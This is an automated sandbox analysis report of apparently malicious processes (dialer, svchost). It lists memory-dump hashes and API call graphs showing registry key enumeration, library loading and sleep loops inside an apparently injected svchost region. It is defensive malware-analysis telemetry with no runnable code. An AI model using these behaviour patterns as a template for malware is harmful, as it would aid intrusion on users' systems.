                                                                                                                            • Associated: 0000002F.00000002.3323392401.00007FF75E946000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323612636.00007FF75E948000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3323861695.00007FF75E94B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            • Associated: 0000002F.00000002.3324136073.00007FF75E94F000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_47_2_7ff75e940000_dialer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: fprintf
                                                                                                                            • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                            • API String ID: 383729395-2468659920
                                                                                                                            • Opcode ID: 2e00c8b2886a6415b21ac8021bb90762be8cffcb15cbd36188c64a4976bc95c1
                                                                                                                            • Instruction ID: 9ebf166856dd48b4f5cedfac9f2e6ebe5842f28ac06f57d7f96ce966cb68cbe2
                                                                                                                            • Opcode Fuzzy Hash: 2e00c8b2886a6415b21ac8021bb90762be8cffcb15cbd36188c64a4976bc95c1
                                                                                                                            • Instruction Fuzzy Hash: E3F0CD66808F8482D211DF28E4012ABB371FF9E789F645326EFC926624DF29D556C710

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:0.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:468
                                                                                                                            Total number of Limit Nodes:3
                                                                                                                            execution_graph 15169 23c9fd9c0e4 15170 23c9fd9c0fd 15169->15170 15183 23c9fd9c0f9 15169->15183 15184 23c9fd9ec90 15170->15184 15175 23c9fd9c11b 15215 23c9fd9c158 15175->15215 15176 23c9fd9c10f 15210 23c9fd9d744 15176->15210 15180 23c9fd9d744 __free_lconv_mon 5 API calls 15181 23c9fd9c142 15180->15181 15182 23c9fd9d744 __free_lconv_mon 5 API calls 15181->15182 15182->15183 15185 23c9fd9c102 15184->15185 15186 23c9fd9ec9d 15184->15186 15190 23c9fd9f1ec GetEnvironmentStringsW 15185->15190 15234 23c9fd9cefc 15186->15234 15188 23c9fd9eccc 15251 23c9fd9e968 15188->15251 15191 23c9fd9c107 15190->15191 15192 23c9fd9f21c 15190->15192 15191->15175 15191->15176 15193 23c9fd9f10c WideCharToMultiByte 15192->15193 15194 23c9fd9f26d 15193->15194 15195 23c9fd9f274 FreeEnvironmentStringsW 15194->15195 15196 23c9fd9ca0c 5 API calls 15194->15196 15195->15191 15197 23c9fd9f287 15196->15197 15198 23c9fd9f298 15197->15198 15199 23c9fd9f28f 15197->15199 15201 23c9fd9f10c WideCharToMultiByte 15198->15201 15200 23c9fd9d744 __free_lconv_mon 5 API calls 15199->15200 15202 23c9fd9f296 15200->15202 15203 23c9fd9f2bb 15201->15203 15202->15195 15204 23c9fd9f2c9 15203->15204 15205 23c9fd9f2bf 15203->15205 15207 23c9fd9d744 __free_lconv_mon 5 API calls 15204->15207 15206 23c9fd9d744 __free_lconv_mon 5 API calls 15205->15206 15208 23c9fd9f2c7 FreeEnvironmentStringsW 15206->15208 15207->15208 15208->15191 15211 23c9fd9d749 HeapFree 15210->15211 15212 23c9fd9d77a 15210->15212 15211->15212 15213 23c9fd9d764 __free_lconv_mon __vcrt_FlsSetValue 15211->15213 15212->15183 15214 23c9fd9d6ac __std_exception_copy 4 API calls 15213->15214 15214->15212 15216 23c9fd9c17d 15215->15216 15217 23c9fd9d6cc _invalid_parameter_noinfo 5 API calls 15216->15217 15229 23c9fd9c1b3 15217->15229 15218 23c9fd9c1bb 15219 23c9fd9d744 __free_lconv_mon 5 API calls 15218->15219 15220 23c9fd9c123 15219->15220 15220->15180 15221 23c9fd9c22e 15222 23c9fd9d744 __free_lconv_mon 5 API calls 15221->15222 15222->15220 15223 23c9fd9d6cc _invalid_parameter_noinfo 5 API calls 15223->15229 15224 23c9fd9c21d 15697 23c9fd9c268 15224->15697 15228 23c9fd9d744 __free_lconv_mon 5 API calls 15228->15218 15229->15218 15229->15221 15229->15223 15229->15224 15230 23c9fd9c253 15229->15230 15231 23c9fd9d744 __free_lconv_mon 5 API calls 15229->15231 15688 23c9fd9c6e8 15229->15688 15232 23c9fd9d590 _invalid_parameter_noinfo 6 API calls 15230->15232 15231->15229 15233 23c9fd9c266 15232->15233 15235 23c9fd9cf28 FlsSetValue 15234->15235 15236 23c9fd9cf0d FlsGetValue 15234->15236 15238 23c9fd9cf35 15235->15238 15241 23c9fd9cf1a 15235->15241 15237 23c9fd9cf22 15236->15237 15236->15241 15237->15235 15274 23c9fd9d6cc 15238->15274 15241->15188 15242 23c9fd9cf62 FlsSetValue 15244 23c9fd9cf6e FlsSetValue 15242->15244 15245 23c9fd9cf80 15242->15245 15243 23c9fd9cf52 FlsSetValue 15246 23c9fd9cf5b 15243->15246 15244->15246 15278 23c9fd9cb94 15245->15278 15248 23c9fd9d744 __free_lconv_mon 5 API calls 15246->15248 15248->15241 15250 23c9fd9d744 __free_lconv_mon 5 API calls 15250->15241 15421 23c9fd9ebd8 15251->15421 15258 23c9fd9e9d3 15259 23c9fd9d744 __free_lconv_mon 5 API calls 15258->15259 15273 23c9fd9e9ba 15259->15273 15260 23c9fd9e9e2 15260->15260 15440 23c9fd9ed0c 15260->15440 15263 23c9fd9eade 15264 23c9fd9d6ac __std_exception_copy 5 API calls 15263->15264 15265 23c9fd9eae3 15264->15265 15269 23c9fd9d744 __free_lconv_mon 5 API calls 15265->15269 15266 23c9fd9eb39 15268 23c9fd9eba0 15266->15268 15451 23c9fd9e498 15266->15451 15267 23c9fd9eaf8 15267->15266 15270 23c9fd9d744 __free_lconv_mon 5 API calls 15267->15270 15272 23c9fd9d744 __free_lconv_mon 5 API calls 15268->15272 15269->15273 15270->15266 15272->15273 15273->15185 15277 23c9fd9d6dd _invalid_parameter_noinfo 15274->15277 15276 23c9fd9cf44 15276->15242 15276->15243 15277->15276 15282 23c9fd9d6ac 15277->15282 15279 23c9fd9cc46 _invalid_parameter_noinfo 15278->15279 15301 23c9fd9caec 15279->15301 15281 23c9fd9cc5b 15281->15241 15281->15250 15285 23c9fd9cfa0 15282->15285 15284 23c9fd9d6b5 15284->15276 15288 23c9fd9cfb5 __vcrt_FlsSetValue 15285->15288 15286 23c9fd9cfe1 FlsSetValue 15287 23c9fd9cff3 15286->15287 15291 23c9fd9cfd1 _CreateFrameInfo 15286->15291 15289 23c9fd9d6cc _invalid_parameter_noinfo HeapFree 15287->15289 15288->15286 15288->15291 15290 23c9fd9d002 15289->15290 15292 23c9fd9d020 FlsSetValue 15290->15292 15293 23c9fd9d010 FlsSetValue 15290->15293 15291->15284 15295 23c9fd9d03e 15292->15295 15296 23c9fd9d02c FlsSetValue 15292->15296 15294 23c9fd9d019 15293->15294 15297 23c9fd9d744 __free_lconv_mon HeapFree 15294->15297 15298 23c9fd9cb94 _invalid_parameter_noinfo HeapFree 15295->15298 15296->15294 15297->15291 15299 23c9fd9d046 15298->15299 15300 23c9fd9d744 __free_lconv_mon HeapFree 15299->15300 15300->15291 15302 23c9fd9cb08 15301->15302 15305 23c9fd9cd7c 15302->15305 15304 23c9fd9cb1e 15304->15281 15306 23c9fd9cdc4 Concurrency::details::SchedulerProxy::DeleteThis 15305->15306 15307 23c9fd9cd98 Concurrency::details::SchedulerProxy::DeleteThis 15305->15307 15306->15304 15307->15306 15309 23c9fda07b4 15307->15309 15310 23c9fda0850 15309->15310 15313 23c9fda07d7 15309->15313 15311 23c9fda08a3 15310->15311 15314 23c9fd9d744 __free_lconv_mon 5 API calls 15310->15314 15375 23c9fda0954 15311->15375 15313->15310 15315 23c9fda0816 15313->15315 15320 23c9fd9d744 __free_lconv_mon 5 API calls 15313->15320 15316 23c9fda0874 15314->15316 15317 23c9fda0838 15315->15317 15323 23c9fd9d744 __free_lconv_mon 5 API calls 15315->15323 15318 23c9fd9d744 __free_lconv_mon 5 API calls 15316->15318 15319 23c9fd9d744 __free_lconv_mon 5 API calls 15317->15319 15321 23c9fda0888 15318->15321 15325 23c9fda0844 15319->15325 15326 23c9fda080a 15320->15326 15322 23c9fd9d744 __free_lconv_mon 5 API calls 15321->15322 15328 23c9fda0897 15322->15328 15329 23c9fda082c 15323->15329 15324 23c9fda090e 15330 23c9fd9d744 __free_lconv_mon 5 API calls 15325->15330 15335 23c9fda2fc8 15326->15335 15327 23c9fda08af 15327->15324 15334 23c9fd9d744 5 API calls __free_lconv_mon 15327->15334 15332 23c9fd9d744 __free_lconv_mon 5 API calls 15328->15332 15363 23c9fda30d4 15329->15363 15330->15310 15332->15311 15334->15327 15336 23c9fda2fd1 15335->15336 15361 23c9fda30cc 15335->15361 15337 23c9fda2feb 15336->15337 15338 23c9fd9d744 __free_lconv_mon 5 API calls 15336->15338 15339 23c9fda2ffd 15337->15339 15340 23c9fd9d744 __free_lconv_mon 5 API calls 15337->15340 15338->15337 15341 23c9fda300f 15339->15341 15342 23c9fd9d744 __free_lconv_mon 5 API calls 15339->15342 15340->15339 15343 23c9fda3021 15341->15343 15344 23c9fd9d744 __free_lconv_mon 5 API calls 15341->15344 15342->15341 15345 23c9fda3033 15343->15345 15347 23c9fd9d744 __free_lconv_mon 5 API calls 15343->15347 15344->15343 15346 23c9fda3045 15345->15346 15348 23c9fd9d744 __free_lconv_mon 5 API calls 15345->15348 15349 23c9fda3057 15346->15349 15350 23c9fd9d744 __free_lconv_mon 5 API calls 15346->15350 15347->15345 15348->15346 15351 23c9fda3069 15349->15351 15352 23c9fd9d744 __free_lconv_mon 5 API calls 15349->15352 15350->15349 15353 23c9fd9d744 __free_lconv_mon 5 API calls 15351->15353 15354 23c9fda307b 15351->15354 15352->15351 15353->15354 15355 23c9fda308d 15354->15355 15356 23c9fd9d744 __free_lconv_mon 5 API calls 15354->15356 15357 23c9fda30a2 15355->15357 15358 23c9fd9d744 __free_lconv_mon 5 API calls 15355->15358 15356->15355 15359 23c9fda30b7 15357->15359 15360 23c9fd9d744 __free_lconv_mon 5 API calls 15357->15360 15358->15357 15359->15361 15362 23c9fd9d744 __free_lconv_mon 5 API calls 15359->15362 15360->15359 15361->15315 15362->15361 15364 23c9fda30d9 15363->15364 15373 23c9fda313a 15363->15373 15365 23c9fd9d744 __free_lconv_mon 5 API calls 15364->15365 15367 23c9fda30f2 15364->15367 15365->15367 15366 23c9fda3104 15369 23c9fda3116 15366->15369 15370 23c9fd9d744 __free_lconv_mon 5 API calls 15366->15370 15367->15366 15368 23c9fd9d744 __free_lconv_mon 5 API calls 15367->15368 15368->15366 15371 23c9fda3128 15369->15371 15372 23c9fd9d744 __free_lconv_mon 5 API calls 15369->15372 15370->15369 15371->15373 15374 23c9fd9d744 __free_lconv_mon 5 API calls 15371->15374 15372->15371 15373->15317 15374->15373 15376 23c9fda0959 15375->15376 15377 23c9fda0985 15375->15377 15376->15377 15381 23c9fda3174 15376->15381 15377->15327 15380 23c9fd9d744 __free_lconv_mon 5 API calls 15380->15377 15382 23c9fda097d 15381->15382 15383 23c9fda317d 15381->15383 15382->15380 15417 23c9fda3140 15383->15417 15386 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15387 23c9fda31a6 15386->15387 15388 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15387->15388 15389 23c9fda31b4 15388->15389 15390 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15389->15390 15391 23c9fda31c2 15390->15391 15392 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15391->15392 15393 23c9fda31d1 15392->15393 15394 23c9fd9d744 __free_lconv_mon 5 API calls 15393->15394 15395 23c9fda31dd 15394->15395 15396 23c9fd9d744 __free_lconv_mon 5 API calls 15395->15396 15397 23c9fda31e9 15396->15397 15398 23c9fd9d744 __free_lconv_mon 5 API calls 15397->15398 15399 23c9fda31f5 15398->15399 15400 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15399->15400 15401 23c9fda3203 15400->15401 15402 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15401->15402 15403 23c9fda3211 15402->15403 15404 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15403->15404 15405 23c9fda321f 15404->15405 15406 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15405->15406 15407 23c9fda322d 15406->15407 15408 23c9fda3140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15407->15408 15409 23c9fda323c 15408->15409 15410 23c9fd9d744 __free_lconv_mon 5 API calls 15409->15410 15411 23c9fda3248 15410->15411 15412 23c9fd9d744 __free_lconv_mon 5 API calls 15411->15412 15413 23c9fda3254 15412->15413 15414 23c9fd9d744 __free_lconv_mon 5 API calls 15413->15414 15415 23c9fda3260 15414->15415 15416 23c9fd9d744 __free_lconv_mon 5 API calls 15415->15416 15416->15382 15418 23c9fda3156 15417->15418 15419 23c9fda3167 15417->15419 15418->15419 15420 23c9fd9d744 __free_lconv_mon 5 API calls 15418->15420 15419->15386 15420->15418 15423 23c9fd9ebfb 15421->15423 15422 23c9fd9ec05 15425 23c9fd9cefc 10 API calls 15422->15425 15428 23c9fd9e99d 15422->15428 15423->15422 15424 23c9fd9d744 __free_lconv_mon 5 API calls 15423->15424 15424->15422 15426 23c9fd9eccc 15425->15426 15427 23c9fd9e968 41 API calls 15426->15427 15427->15428 15429 23c9fd9e668 15428->15429 15463 23c9fd9e1b4 15429->15463 15432 23c9fd9e69a 15434 23c9fd9e69f GetACP 15432->15434 15435 23c9fd9e6af 15432->15435 15433 23c9fd9e688 GetOEMCP 15433->15435 15434->15435 15435->15273 15436 23c9fd9ca0c 15435->15436 15439 23c9fd9ca1b _invalid_parameter_noinfo 15436->15439 15437 23c9fd9d6ac __std_exception_copy 5 API calls 15438 23c9fd9ca55 15437->15438 15438->15258 15438->15260 15439->15437 15439->15438 15441 23c9fd9e668 17 API calls 15440->15441 15442 23c9fd9ed39 15441->15442 15443 23c9fd9ed76 IsValidCodePage 15442->15443 15448 23c9fd9ee8f 15442->15448 15450 23c9fd9ed90 15442->15450 15445 23c9fd9ed87 15443->15445 15443->15448 15447 23c9fd9edb6 GetCPInfo 15445->15447 15445->15450 15446 23c9fd9ead5 15446->15263 15446->15267 15447->15448 15447->15450 15537 23c9fd97940 15448->15537 15526 23c9fd9e780 15450->15526 15453 23c9fd9e4b4 15451->15453 15452 23c9fd9d6ac __std_exception_copy 5 API calls 15454 23c9fd9e550 15452->15454 15453->15452 15456 23c9fd9e4e1 15453->15456 15620 23c9fd9d570 15454->15620 15457 23c9fd9d6ac __std_exception_copy 5 API calls 15456->15457 15461 23c9fd9e593 15456->15461 15458 23c9fd9e5f1 15457->15458 15459 23c9fd9d570 _invalid_parameter_noinfo 24 API calls 15458->15459 15459->15461 15460 23c9fd9e62d 15460->15268 15461->15460 15462 23c9fd9d744 __free_lconv_mon 5 API calls 15461->15462 15462->15460 15464 23c9fd9e1d8 15463->15464 15470 23c9fd9e1d3 15463->15470 15464->15470 15471 23c9fd9ce28 15464->15471 15466 23c9fd9e1f3 15506 23c9fda03fc 15466->15506 15470->15432 15470->15433 15472 23c9fd9ce3d __vcrt_FlsSetValue 15471->15472 15473 23c9fd9ce69 FlsSetValue 15472->15473 15474 23c9fd9ce4c FlsGetValue 15472->15474 15476 23c9fd9ce7b 15473->15476 15489 23c9fd9ce59 _CreateFrameInfo 15473->15489 15475 23c9fd9ce63 15474->15475 15474->15489 15475->15473 15477 23c9fd9d6cc _invalid_parameter_noinfo 5 API calls 15476->15477 15478 23c9fd9ce8a 15477->15478 15479 23c9fd9cea8 FlsSetValue 15478->15479 15480 23c9fd9ce98 FlsSetValue 15478->15480 15481 23c9fd9cec6 15479->15481 15482 23c9fd9ceb4 FlsSetValue 15479->15482 15484 23c9fd9cea1 15480->15484 15485 23c9fd9cb94 _invalid_parameter_noinfo 5 API calls 15481->15485 15482->15484 15483 23c9fd9cee2 15483->15466 15486 23c9fd9d744 __free_lconv_mon 5 API calls 15484->15486 15487 23c9fd9cece 15485->15487 15486->15489 15488 23c9fd9d744 __free_lconv_mon 5 API calls 15487->15488 15488->15489 15489->15483 15490 23c9fd9cf28 FlsSetValue 15489->15490 15491 23c9fd9cf0d FlsGetValue 15489->15491 15493 23c9fd9cf35 15490->15493 15496 23c9fd9cf1a 15490->15496 15492 23c9fd9cf22 15491->15492 15491->15496 15492->15490 15494 23c9fd9d6cc _invalid_parameter_noinfo 5 API calls 15493->15494 15495 23c9fd9cf44 15494->15495 15497 23c9fd9cf62 FlsSetValue 15495->15497 15498 23c9fd9cf52 FlsSetValue 15495->15498 15496->15466 15499 23c9fd9cf6e FlsSetValue 15497->15499 15500 23c9fd9cf80 15497->15500 15501 23c9fd9cf5b 15498->15501 15499->15501 15502 23c9fd9cb94 _invalid_parameter_noinfo 5 API calls 15500->15502 15503 23c9fd9d744 __free_lconv_mon 5 API calls 15501->15503 15504 23c9fd9cf88 15502->15504 15503->15496 15504->15496 15505 23c9fd9d744 __free_lconv_mon 5 API calls 15504->15505 15505->15496 15507 23c9fd9e216 15506->15507 15508 23c9fda0411 15506->15508 15510 23c9fda0468 15507->15510 15508->15507 15514 23c9fda0a5c 15508->15514 15511 23c9fda047d 15510->15511 15512 23c9fda0490 15510->15512 15511->15512 15523 23c9fd9ecf0 15511->15523 15512->15470 15515 23c9fd9ce28 _invalid_parameter_noinfo 15 API calls 15514->15515 15516 23c9fda0a6b 15515->15516 15518 23c9fda0aa4 15516->15518 15519 23c9fda0acc 15516->15519 15518->15507 15520 23c9fda0ade Concurrency::details::SchedulerProxy::DeleteThis 15519->15520 15522 23c9fda0aeb 15519->15522 15521 23c9fda07b4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15520->15521 15520->15522 15521->15522 15522->15518 15524 23c9fd9ce28 _invalid_parameter_noinfo 15 API calls 15523->15524 15525 23c9fd9ecf9 15524->15525 15527 23c9fd9e7bd GetCPInfo 15526->15527 15529 23c9fd9e8b3 15526->15529 15528 23c9fd9e7d0 15527->15528 15527->15529 15542 23c9fda1544 15528->15542 15530 23c9fd97940 _log10_special RtlVirtualUnwind 15529->15530 15532 23c9fd9e952 15530->15532 15532->15448 15538 23c9fd97949 _invalid_parameter_noinfo 15537->15538 15539 23c9fd97954 15538->15539 15616 23c9fd98320 15538->15616 15539->15446 15541 23c9fd98157 15541->15446 15543 23c9fd9e1b4 15 API calls 15542->15543 15544 23c9fda1586 15543->15544 15562 23c9fd9f07c 15544->15562 15564 23c9fd9f085 MultiByteToWideChar 15562->15564 15617 23c9fd98331 capture_current_context 15616->15617 15618 23c9fd98389 15617->15618 15619 23c9fd98350 RtlVirtualUnwind 15617->15619 15618->15541 15619->15617 15619->15618 15623 23c9fd9d408 15620->15623 15624 23c9fd9d433 15623->15624 15631 23c9fd9d4a4 15624->15631 15626 23c9fd9d45a 15627 23c9fd9d47d 15626->15627 15639 23c9fd9c7a0 15626->15639 15629 23c9fd9d492 15627->15629 15630 23c9fd9c7a0 _invalid_parameter_noinfo 18 API calls 15627->15630 15629->15456 15630->15629 15650 23c9fd9d1ec 15631->15650 15633 23c9fd9d4ce _invalid_parameter_noinfo 15634 23c9fd9d4df _invalid_parameter_noinfo 15633->15634 15654 23c9fd9d590 15633->15654 15634->15626 15640 23c9fd9c7f8 15639->15640 15641 23c9fd9c7af __vcrt_FlsSetValue 15639->15641 15640->15627 15642 23c9fd9d068 _invalid_parameter_noinfo 8 API calls 15641->15642 15643 23c9fd9c7de _CreateFrameInfo 15642->15643 15643->15640 15644 23c9fd9c7a0 _invalid_parameter_noinfo 18 API calls 15643->15644 15645 23c9fd9c827 15644->15645 15680 23c9fda0430 15645->15680 15651 23c9fd9d208 __vcrt_FlsSetValue 15650->15651 15653 23c9fd9d233 _CreateFrameInfo 15650->15653 15659 23c9fd9d068 15651->15659 15653->15633 15655 23c9fd9d59f _invalid_parameter_noinfo 15654->15655 15673 23c9fd9d2a4 15655->15673 15657 23c9fd9d5be _invalid_parameter_noinfo 15658 23c9fd9d5c4 TerminateProcess 15657->15658 15660 23c9fd9d087 FlsGetValue 15659->15660 15662 23c9fd9d09c 15659->15662 15661 23c9fd9d094 15660->15661 15660->15662 15661->15653 15662->15661 15663 23c9fd9d6cc _invalid_parameter_noinfo 5 API calls 15662->15663 15664 23c9fd9d0be 15663->15664 15665 23c9fd9d0dc FlsSetValue 15664->15665 15668 23c9fd9d0cc 15664->15668 15666 23c9fd9d0fa 15665->15666 15667 23c9fd9d0e8 FlsSetValue 15665->15667 15669 23c9fd9cb94 _invalid_parameter_noinfo 5 API calls 15666->15669 15667->15668 15670 23c9fd9d744 __free_lconv_mon 5 API calls 15668->15670 15671 23c9fd9d102 15669->15671 15670->15661 15672 23c9fd9d744 __free_lconv_mon 5 API calls 15671->15672 15672->15661 15674 23c9fd9d2de _invalid_parameter_noinfo capture_current_context 15673->15674 15675 23c9fd9d376 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15674->15675 15676 23c9fd9d340 RtlVirtualUnwind 15674->15676 15677 23c9fd9d3c8 _invalid_parameter_noinfo 15675->15677 15676->15675 15678 23c9fd97940 _log10_special RtlVirtualUnwind 15677->15678 15679 23c9fd9d3e7 15678->15679 15679->15657 15681 23c9fda0449 15680->15681 15682 23c9fd9c84f 15680->15682 15681->15682 15683 23c9fda0a5c _invalid_parameter_noinfo 15 API calls 15681->15683 15684 23c9fda049c 15682->15684 15683->15682 15685 23c9fda04b5 15684->15685 15686 23c9fd9c85f 15684->15686 15685->15686 15687 23c9fd9ecf0 _invalid_parameter_noinfo 15 API calls 15685->15687 15686->15627 15687->15686 15689 23c9fd9c6f5 15688->15689 15690 23c9fd9c6ff 15688->15690 15689->15690 15695 23c9fd9c71a 15689->15695 15691 23c9fd9d6ac __std_exception_copy 5 API calls 15690->15691 15692 23c9fd9c706 15691->15692 15693 23c9fd9d570 _invalid_parameter_noinfo 24 API calls 15692->15693 15694 23c9fd9c712 15693->15694 15694->15229 15695->15694 15696 23c9fd9d6ac __std_exception_copy 5 API calls 15695->15696 15696->15692 15698 23c9fd9c225 15697->15698 15699 23c9fd9c26d 15697->15699 15698->15228 15700 23c9fd9c296 15699->15700 15702 23c9fd9d744 __free_lconv_mon 5 API calls 15699->15702 15701 23c9fd9d744 __free_lconv_mon 5 API calls 15700->15701 15701->15698 15702->15699 15703 23c9fd6273c 15705 23c9fd6276a 15703->15705 15704 23c9fd62858 LoadLibraryA 15704->15705 15705->15704 15706 23c9fd628d4 15705->15706 15707 23c9fd91abc 15712 23c9fd91628 GetProcessHeap 15707->15712 15709 23c9fd91ad2 Sleep SleepEx 15710 23c9fd91acb 15709->15710 15710->15709 15711 23c9fd91598 StrCmpIW StrCmpW 15710->15711 15711->15710 15713 23c9fd91648 _invalid_parameter_noinfo 15712->15713 15757 23c9fd91268 GetProcessHeap 15713->15757 15715 23c9fd91650 15716 23c9fd91268 2 API calls 15715->15716 15717 23c9fd91661 15716->15717 15718 23c9fd91268 2 API calls 15717->15718 15719 23c9fd9166a 15718->15719 15720 23c9fd91268 2 API calls 15719->15720 15721 23c9fd91673 15720->15721 15722 23c9fd9168e RegOpenKeyExW 15721->15722 15723 23c9fd918a6 15722->15723 15724 23c9fd916c0 RegOpenKeyExW 15722->15724 15723->15710 15725 23c9fd916e9 15724->15725 15726 23c9fd916ff RegOpenKeyExW 15724->15726 15761 23c9fd912bc RegQueryInfoKeyW 15725->15761 15728 23c9fd9173a RegOpenKeyExW 15726->15728 15729 23c9fd91723 15726->15729 15731 23c9fd91775 RegOpenKeyExW 15728->15731 15732 23c9fd9175e 15728->15732 15772 23c9fd9104c RegQueryInfoKeyW 15729->15772 15736 23c9fd91799 15731->15736 15737 23c9fd917b0 RegOpenKeyExW 15731->15737 15735 23c9fd912bc 13 API calls 15732->15735 15738 23c9fd9176b RegCloseKey 15735->15738 15739 23c9fd912bc 13 API calls 15736->15739 15740 23c9fd917d4 15737->15740 15741 23c9fd917eb RegOpenKeyExW 15737->15741 15738->15731 15742 23c9fd917a6 RegCloseKey 15739->15742 15743 23c9fd912bc 13 API calls 15740->15743 15744 23c9fd91826 RegOpenKeyExW 15741->15744 15745 23c9fd9180f 15741->15745 15742->15737 15749 23c9fd917e1 RegCloseKey 15743->15749 15747 23c9fd9184a 15744->15747 15748 23c9fd91861 RegOpenKeyExW 15744->15748 15746 23c9fd9104c 5 API calls 15745->15746 15750 23c9fd9181c RegCloseKey 15746->15750 15751 23c9fd9104c 5 API calls 15747->15751 15752 23c9fd91885 15748->15752 15753 23c9fd9189c RegCloseKey 15748->15753 15749->15741 15750->15744 15754 23c9fd91857 RegCloseKey 15751->15754 15755 23c9fd9104c 5 API calls 15752->15755 15753->15723 15754->15748 15756 23c9fd91892 RegCloseKey 15755->15756 15756->15753 15778 23c9fda6168 15757->15778 15759 23c9fd91283 GetProcessHeap 15760 23c9fd912ae _invalid_parameter_noinfo 15759->15760 15760->15715 15762 23c9fd91327 GetProcessHeap 15761->15762 15763 23c9fd9148a RegCloseKey 15761->15763 15764 23c9fd9133e _invalid_parameter_noinfo 15762->15764 15763->15726 15765 23c9fd91476 GetProcessHeap HeapFree 15764->15765 15766 23c9fd91352 RegEnumValueW 15764->15766 15768 23c9fd9141e lstrlenW GetProcessHeap 15764->15768 15769 23c9fd913d3 GetProcessHeap 15764->15769 15770 23c9fd913f3 GetProcessHeap HeapFree 15764->15770 15771 23c9fd91443 StrCpyW 15764->15771 15780 23c9fd9152c 15764->15780 15765->15763 15766->15764 15768->15764 15769->15764 15770->15768 15771->15764 15773 23c9fd911b5 RegCloseKey 15772->15773 15776 23c9fd910bf _invalid_parameter_noinfo 15772->15776 15773->15728 15774 23c9fd910cf RegEnumValueW 15774->15776 15775 23c9fd9114e GetProcessHeap 15775->15776 15776->15773 15776->15774 15776->15775 15777 23c9fd9116e GetProcessHeap HeapFree 15776->15777 15777->15776 15779 23c9fda6177 15778->15779 15781 23c9fd9157c 15780->15781 15784 23c9fd91546 15780->15784 15781->15764 15782 23c9fd91565 StrCmpW 15782->15784 15783 23c9fd9155d StrCmpIW 15783->15784 15784->15781 15784->15782 15784->15783

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: cbded6a7cf5b7805f93012bc6e9f91fd45a45d9c4a0ce9048524cc3669026ffc
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 41E06D3B601704C6EB058F62D80C36A3AE1FB89F0AF16C024CA0907351DF7DC599C750

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3331406755-0
                                                                                                                            • Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                                                                                            • Instruction ID: f6557c66b56c6872ac1de7e600478dd8ff0236ec382c4d22c79d246fffc99fc4
                                                                                                                            • Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                                                                                            • Instruction Fuzzy Hash: FC31D933225B50C1EB24DF61644437A7794F784FD5F694225E98AA3BC5DF3CC6918304

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: 55455f91b24e61534834da54e7534c5b240e236b9e7244e17661c136f86b0d8f
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: 5211803361274082FB60BFB1F84D3792298AF55747F724129D91AA2591EF7CC3C48354

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0000023C9FD91628: GetProcessHeap.KERNEL32 ref: 0000023C9FD91633
